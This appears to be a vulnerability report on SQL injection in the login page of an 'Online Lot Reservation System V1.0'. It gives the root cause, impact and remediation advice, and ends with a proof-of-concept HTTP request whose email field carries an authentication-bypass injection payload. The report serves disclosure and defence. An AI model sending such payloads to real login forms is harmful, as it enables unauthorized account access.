# Vulnerability Summary: SQL Injection in Online Lot Reservation System V1.0 ## Vulnerability Overview * **Project Name**: Online Lot Reservation System V1.0 * **Vulnerable File**: `loginuser.php` * **Vulnerability Type**: SQL Injection * **Root Cause**: The system directly concatenates user input into SQL query statements without using prepared statements or input filtering. Attackers can inject malicious SQL code via the `email` and `password` parameters. ## Impact Scope * **Impact**: Attackers can bypass login authentication and log into the system as an administrator or any other user. * **Exploitation Conditions**: No prior login or authorization is required to exploit this vulnerability. ## Remediation 1. **Use Prepared Statements**: ```php $stmt = $mysqli->prepare("SELECT * FROM user WHERE email = ? AND password = ?"); $stmt->bind_param("ss", $email, $password); ``` 2. **Input Validation and Filtering**: Strictly validate user input formats and reject inputs containing special SQL characters. 3. **Error Handling**: Disable the output of database error messages to prevent leakage of database schema information. 4. **Principle of Least Privilege**: Database connections should use accounts with the minimum necessary permissions, avoiding granting excessive privileges to the application. ## POC Code (Successful Exploitation Packet) ```http POST /onlinelot/loginuser.php HTTP/1.1 Host: 192.168.171.1:7777 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.171.1:7777/onlinelot/loginfailed.php Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Origin: http://192.168.171.1:7777 Cache-Control: max-age=0 Cookie: PHPSESSID=0h1lq9m6w4whrshdbmsoh11 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 Content-Length: 69 email1vadsn27+OR%271%27%3D%271%27--+-&password=111®ister=Log-In ```